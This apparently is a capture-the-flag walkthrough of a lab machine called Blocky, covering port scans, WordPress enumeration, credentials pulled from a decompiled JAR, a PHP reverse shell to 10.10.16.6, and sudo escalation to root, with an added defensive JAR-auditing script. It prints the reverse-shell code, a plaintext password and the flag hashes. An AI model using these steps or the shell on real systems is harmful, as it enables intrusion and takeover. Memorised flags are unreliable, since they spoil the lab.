Information Gathering
IP Address | Open Ports |
---|---|
10.10.10.37 | TCP:21,22,80,25565 |
$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
HTTPD
# echo '10.10.10.37 blocky.htb'>>/etc/hosts
$ wpscan --url http://blocky.htb/ --enumerate u
username:notch
$ dirb http://blocky.htb
http://blocky.htb/plugins/
http://blocky.htb/phpmyadmin/
Decompiling the JAR
$ wget http://blocky.htb/plugins/files/BlockyCore.jar
$ binwalk BlockyCore.jar
$ foremost BlockyCore.jar
$ cd ./output/zip
$ unzip 00000000.zip
$ cd ./com/myfirstplugin
$ javap -c BlockyCore.class
username:root password:8YsqfCTnvxAUeduzjNSXe22
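From the defender's side, the string constants that `javap -c` prints here can be checked before a plugin is published on a web server. The following is an added example, not part of the original writeup: it parses the constant pool of each `.class` file in a JAR and flags classes that pair credential-like identifiers with string literals. The identifier regex is an assumed heuristic, and literals are masked so the audit log does not leak them.

```python
import io
import re
import struct
import zipfile

# Payload size per constant-pool tag (JVM spec 4.4); tag 1 (Utf8) is variable length.
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Assumed naming heuristic for identifiers that tend to hold credentials.
SUSPICIOUS = re.compile(r"pass|pwd|secret|token|user", re.I)


def parse_constant_pool(data):
    """Return (identifiers, string_literals) from one .class file."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx, utf8, str_refs = 10, 1, {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag in CP_SIZES:
            if tag == 8:  # CONSTANT_String points at the Utf8 entry holding the literal
                str_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += CP_SIZES[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        idx += 2 if tag in (5, 6) else 1  # long/double occupy two slots
    literals = [utf8[i] for i in str_refs if i in utf8]
    names = [s for i, s in utf8.items() if i not in str_refs]
    return names, literals


def audit_jar(jar_bytes):
    """Flag classes pairing credential-like identifiers with string literals."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for entry in jar.namelist():
            if not entry.endswith(".class"):
                continue
            names, literals = parse_constant_pool(jar.read(entry))
            hits = sorted(n for n in names if SUSPICIOUS.search(n))
            if hits and literals:
                masked = [lit[:2] + "*" * (len(lit) - 2) for lit in literals]
                findings.append({"class": entry, "identifiers": hits, "literals": masked})
    return findings
```

Run as a build or pre-deployment gate, a non-empty result from `audit_jar` means the artifact should not be served from a public directory such as `/plugins/` until the credentials are moved to configuration outside the JAR.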
www-data Access
Log in to phpMyAdmin and update notch's password
https://www.useotools.com/ru/wordpress-password-hash-generator
$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/
$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
$ curl http://blocky.htb/
$ su notch
Password: 8YsqfCTnvxAUeduzjNSXe22
User.txt
23da8f7548a2c1df972caa7fc6ca3b9d
Privilege Escalation
$ sudo -l
$ sudo /bin/bash
Root.txt
8e66e7402571816ee90419d1a6eca642